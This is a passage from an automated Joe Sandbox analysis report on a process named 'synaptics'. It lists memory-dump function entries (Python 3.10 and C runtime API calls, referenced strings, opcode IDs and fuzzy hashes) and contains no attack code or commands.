                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: bad operand type for abs(): '%.200s'$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-3968165083
                                                                                                                                                                                                      • Opcode ID: 54097c8ac9f6a7b3884bac45b5dfc8dcb773c19ad6fb51b4fc2de38d7d470093
                                                                                                                                                                                                      • Instruction ID: c403a65556fb0e2e92da493a52003de158fe8515517d0ad97b957faa3dddf442
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54097c8ac9f6a7b3884bac45b5dfc8dcb773c19ad6fb51b4fc2de38d7d470093
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF05E797062089FEF04DE61E845E697BA5AB8061EB948468E80C8BE11E731E861CB80
                                                                                                                                                                                                      Function 6C450D90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C450DB1
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad operand type for unary ~: '%.200s', xrefs: 6C450DD7
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C450DA5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: bad operand type for unary ~: '%.200s'$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-122179322
                                                                                                                                                                                                      • Opcode ID: b608bdf82e074cd4978078247f7179d3c061468a889b87963bbdce66046049cd
                                                                                                                                                                                                      • Instruction ID: 6af02f8ef6f3311c63a187723b2b30510282782207c1f50e451a3d7cff5611ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b608bdf82e074cd4978078247f7179d3c061468a889b87963bbdce66046049cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21F08235709209DFEF44DF61EC55E6977B5AF8021EB548068E80C8BF11E735E864DB80
                                                                                                                                                                                                      Function 005418B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __current_exception.VCRUNTIME140 ref: 005418F5
                                                                                                                                                                                                      • __current_exception_context.VCRUNTIME140 ref: 005418FF
                                                                                                                                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00541906
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                      • Opcode ID: f035ea40949e113c15fd60c3fd637146e609ec2d22920f9e61562b15c897fe55
                                                                                                                                                                                                      • Instruction ID: 93ac892b7d7d313c1f6a98ad7a05389a9cc3e6587419813670ac89ae45428ff1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f035ea40949e113c15fd60c3fd637146e609ec2d22920f9e61562b15c897fe55
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF0A031000B11CB8B30AEA994480D9BFBCFF50329358081AE458CBA12D770EDD1C6DE
                                                                                                                                                                                                      Function 6C476E30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(?), ref: 6C476E37
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(00000000), ref: 6C476E5D
                                                                                                                                                                                                      • _PyDict_DelItem_KnownHash.PYTHON310(?,00000000,00000000), ref: 6C476E6F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Hash$Dict_FromItem_KnownObject_Unicode_
                                                                                                                                                                                                      • String ID: @Btl
                                                                                                                                                                                                      • API String ID: 2417994093-3323547406
                                                                                                                                                                                                      • Opcode ID: 7e6b4a87437e525c9e4a845cd0859a4b0a5e1430a51bdf44e716d6c48dd78d67
                                                                                                                                                                                                      • Instruction ID: 8c702056967c31b6cecc8461a57e2d273177500026b200bfcf066e4f16d98832
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e6b4a87437e525c9e4a845cd0859a4b0a5e1430a51bdf44e716d6c48dd78d67
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0ED328015242A863199BAFC00ECB7A1A8E013BDB148724FC3CC6FE0E722D89481F2
                                                                                                                                                                                                      Function 6C439E30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,!/Ol,J4Ol,?,6C4F2F21), ref: 6C439E43
                                                                                                                                                                                                      • GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6C4F2F21), ref: 6C439E52
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Console$EventsInputModeNumber
                                                                                                                                                                                                      • String ID: !/Ol$J4Ol
                                                                                                                                                                                                      • API String ID: 3049307426-1322203757
                                                                                                                                                                                                      • Opcode ID: fe2aac3ae2d63db35a585f0cb819137254358245d4e3b217b68d3b7739fd3924
                                                                                                                                                                                                      • Instruction ID: 07dfb1c1a33f0c0f0ecabc7de448d3c8eaf4ca6bf2bd5319fb0531a0c7a593b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe2aac3ae2d63db35a585f0cb819137254358245d4e3b217b68d3b7739fd3924
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFE02032A4143C2BAE00E5B55C02CFA736CCA0752671003D6FC6CC21C0EF315A1682E5
                                                                                                                                                                                                      Function 6C4A2850 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C4A2875
                                                                                                                                                                                                      • PyOS_CheckStack.PYTHON310(?,6C44FDEC,?), ref: 6C4A289C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CheckCurrentStackThread
                                                                                                                                                                                                      • String ID: while getting the str of an object$@Btl
                                                                                                                                                                                                      • API String ID: 3180749676-509671376
                                                                                                                                                                                                      • Opcode ID: 8d78e6efb26855959cb22578650295d4e119470662e085ff698d47ab1be04bab
                                                                                                                                                                                                      • Instruction ID: 23bb2d086c5eb927236fdb21ee6353326da549b41c07d07a0956599018845461
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d78e6efb26855959cb22578650295d4e119470662e085ff698d47ab1be04bab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF0B470B046288BDF21DA52C948E1533B5AB51779F08462CDC58DBB84DB30FC82EBA5
                                                                                                                                                                                                      Function 6C4A09B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4A09C7
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\moduleobject.c,000001D4), ref: 6C4A09EE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\moduleobject.c, xrefs: 6C4A09DD
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4A09E2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatSubtypeType_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\moduleobject.c
                                                                                                                                                                                                      • API String ID: 2789853835-3959214189
                                                                                                                                                                                                      • Opcode ID: 431d05039b6554219e2f4a31a39defd3771729fea4ec31276272265246a2b77c
                                                                                                                                                                                                      • Instruction ID: 4276fd80d20135713096880d675d8b4b818cf2d5d4d623974038fe4e6005f626
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 431d05039b6554219e2f4a31a39defd3771729fea4ec31276272265246a2b77c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E0D872784204678A00E6E9ED41CC677AD9B1526B7044831F94DF3F01E631F81147F1
                                                                                                                                                                                                      Function 73A859F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 73A85A25
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: terminate
                                                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                                                      • API String ID: 1821763600-2671469338
                                                                                                                                                                                                      • Opcode ID: fe9a4c3ad3453b833b59921b479c64ab6be48a4908153053ef5ff433800fbc4e
                                                                                                                                                                                                      • Instruction ID: d16326f26cd992072e96f3c28735f49599adc5a4f08bb7a7bb7fa8f468f8da82
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe9a4c3ad3453b833b59921b479c64ab6be48a4908153053ef5ff433800fbc4e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4F08C35800204CFEB036F61C2867C9F7BAEF45221B1640ABC80997274C7B9E9C0CBE2
                                                                                                                                                                                                      Function 6C3ECD10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 14COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,object already tracked by the garbage collector,D:\a\1\s\Modules\gcmodule.c,000008BB,PyObject_GC_Track), ref: 6C3ECD5D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyObject_GC_Track, xrefs: 6C3ECD46
                                                                                                                                                                                                      • object already tracked by the garbage collector, xrefs: 6C3ECD55
                                                                                                                                                                                                      • D:\a\1\s\Modules\gcmodule.c, xrefs: 6C3ECD50
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AssertFailedObject_
                                                                                                                                                                                                      • String ID: D:\a\1\s\Modules\gcmodule.c$PyObject_GC_Track$object already tracked by the garbage collector
                                                                                                                                                                                                      • API String ID: 2495115322-3985944484
                                                                                                                                                                                                      • Opcode ID: 780d3fc2536e3fc51c2940c5c31a05b10b321828e5472b54c6513256ce5356f7
                                                                                                                                                                                                      • Instruction ID: c20aa8050bd1e12c136d2d15ab313952a7c4970ba4e62ac74530aea9f215b50e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 780d3fc2536e3fc51c2940c5c31a05b10b321828e5472b54c6513256ce5356f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AED0123050A7147BD7209A449D4DF89B7AD6B08704F904C26BB00BBDA887B079958EDD
                                                                                                                                                                                                      Function 73A8A4CD Relevance: 6.2, APIs: 4, Instructions: 201COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 73A8A4D4
                                                                                                                                                                                                      • UnDecorator::getSymbolName.LIBCMT ref: 73A8A562
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8A666
                                                                                                                                                                                                        • Part of subcall function 73A881A7: shared_ptr.LIBCMT ref: 73A881C3
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A723
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 334624791-0
                                                                                                                                                                                                      • Opcode ID: 18b2bc7e28fd2a675e42eb6ec0519b7182261dae27c3ca5afbd5986bcb27acaf
                                                                                                                                                                                                      • Instruction ID: 7b88fdafb65d1638592d45720f7e3d7c0a0958a12239444e41cd114bfac6dacc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18b2bc7e28fd2a675e42eb6ec0519b7182261dae27c3ca5afbd5986bcb27acaf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9813A72D012098FDB06DF94C582BDEBBB9BF09350F18816BD946BB299DB349941CB50
                                                                                                                                                                                                      Function 73A8AB52 Relevance: 6.1, APIs: 4, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8ABDA
                                                                                                                                                                                                        • Part of subcall function 73A87F14: __aulldvrm.LIBCMT ref: 73A87F45
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8ABE7
                                                                                                                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 73A8AC67
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8AC87
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2448499823-0
                                                                                                                                                                                                      • Opcode ID: 703b316fc5ca47c2adeede3c5c479b46029eadc926e96aa6f3502b553f2ff6cf
                                                                                                                                                                                                      • Instruction ID: d13d886886139304f6e055e05ab58126c2860d4399abeabacdaf5d6ca54603f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 703b316fc5ca47c2adeede3c5c479b46029eadc926e96aa6f3502b553f2ff6cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A517FB1900215DFD707CF98C986BDABBB8FF49340F04815BD556AB398DB709A41CB91
                                                                                                                                                                                                      Function 73A86EF1 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EqualOffsetTypeids
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1707706676-0
                                                                                                                                                                                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
